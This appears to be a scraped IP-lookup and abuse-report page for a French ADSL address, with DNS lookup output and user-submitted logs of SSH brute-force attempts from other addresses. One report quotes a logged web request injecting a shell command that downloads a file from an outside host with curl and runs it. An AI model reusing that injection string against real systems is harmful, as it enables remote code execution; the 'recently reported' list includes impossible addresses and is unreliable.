Must be a valid IPv4 or IPv6 ip address, e.g. 127.0.0.1 or 2001:DB8:0:0:8:800:200C:417A
Basic Info

City: unknown

Region: unknown

Country: France

Internet Service Provider: unknown

Hostname: unknown

Organization: unknown

Usage Type: unknown

Comments:
No discussion about this IP yet. Click above link to make one.
Comments on same subnet:
No discussion about this subnet yet..
Whois info:
b
Dig info:
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 82.254.106.42
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 2553
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;82.254.106.42.			IN	A

;; AUTHORITY SECTION:
.			29	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2025013001 1800 900 604800 86400

;; Query time: 45 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Fri Jan 31 10:20:21 CST 2025
;; MSG SIZE  rcvd: 106
Host info
42.106.254.82.in-addr.arpa domain name pointer lns-bzn-26-82-254-106-42.adsl.proxad.net.
Nslookup info:
Server:		183.60.83.19
Address:	183.60.83.19#53

Non-authoritative answer:
42.106.254.82.in-addr.arpa	name = lns-bzn-26-82-254-106-42.adsl.proxad.net.

Authoritative answers can be found from:
Related IP info:
Related comments:
IP Type Details Datetime
173.201.196.61 attackspambots
xmlrpc attack
2020-09-02 04:57:47
179.53.105.76 attack
Sep  1 13:26:32 shivevps sshd[27312]: Did not receive identification string from 179.53.105.76 port 38908
...
2020-09-02 04:40:43
195.158.21.134 attack
2020-09-01T22:08:24.748748vps751288.ovh.net sshd\[21520\]: Invalid user uploader from 195.158.21.134 port 48691
2020-09-01T22:08:24.755038vps751288.ovh.net sshd\[21520\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=195.158.21.134
2020-09-01T22:08:27.111069vps751288.ovh.net sshd\[21520\]: Failed password for invalid user uploader from 195.158.21.134 port 48691 ssh2
2020-09-01T22:12:25.640067vps751288.ovh.net sshd\[21556\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=195.158.21.134  user=root
2020-09-01T22:12:27.414115vps751288.ovh.net sshd\[21556\]: Failed password for root from 195.158.21.134 port 52051 ssh2
2020-09-02 04:45:37
122.35.120.59 attackbotsspam
Sep  1 18:20:33 ajax sshd[30732]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=122.35.120.59 
Sep  1 18:20:35 ajax sshd[30732]: Failed password for invalid user sunil from 122.35.120.59 port 34072 ssh2
2020-09-02 05:10:20
80.106.247.145 attackbots
Sep  1 13:26:32 shivevps sshd[27389]: Did not receive identification string from 80.106.247.145 port 41975
...
2020-09-02 04:41:19
189.1.132.75 attackbotsspam
Sep  1 08:25:56 Host-KEWR-E sshd[11103]: Disconnected from invalid user wanglj 189.1.132.75 port 34388 [preauth]
...
2020-09-02 05:09:56
117.69.231.219 attackbotsspam
Sep  1 13:26:14 shivevps sshd[27181]: Bad protocol version identification '\024' from 117.69.231.219 port 59724
...
2020-09-02 04:54:18
186.229.25.18 attackspam
Sep  1 13:26:03 shivevps sshd[27073]: Bad protocol version identification '\024' from 186.229.25.18 port 49485
...
2020-09-02 05:05:04
190.187.108.252 attackbots
Sep  1 13:26:32 shivevps sshd[27284]: Did not receive identification string from 190.187.108.252 port 37952
...
2020-09-02 04:40:25
218.92.0.199 attackspam
Sep  1 22:37:52 pve1 sshd[14326]: Failed password for root from 218.92.0.199 port 54820 ssh2
Sep  1 22:37:55 pve1 sshd[14326]: Failed password for root from 218.92.0.199 port 54820 ssh2
...
2020-09-02 04:51:46
167.249.168.131 botsattack
https://youtu.be/OORReN7pQ5M
2020-09-02 05:10:20
31.13.191.76 attackbotsspam
[apache-noscript] Found 31.13.191.76
2020-09-02 04:43:00
138.68.226.234 attackspam
 TCP (SYN) 138.68.226.234:58065 -> port 6328, len 44
2020-09-02 05:01:06
202.57.40.227 attack
GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*";cd /tmp;curl -O http://5.206.227.228/zero;sh zero;" HTTP/1.0
2020-09-02 04:51:28
64.76.139.130 attack
Sep  1 13:26:39 shivevps sshd[27498]: Bad protocol version identification '\024' from 64.76.139.130 port 38967
...
2020-09-02 04:35:26

Recently Reported IPs

231.200.37.88 185.117.76.202 255.46.59.120 96.62.179.247
167.7.225.143 213.25.130.19 198.195.130.196 72.22.0.202
16.120.11.237 226.130.182.135 79.189.249.192 170.176.190.217
159.167.209.125 193.42.243.37 87.0.98.80 69.161.1.59
165.54.207.156 44.63.224.165 35.229.133.251 170.250.45.89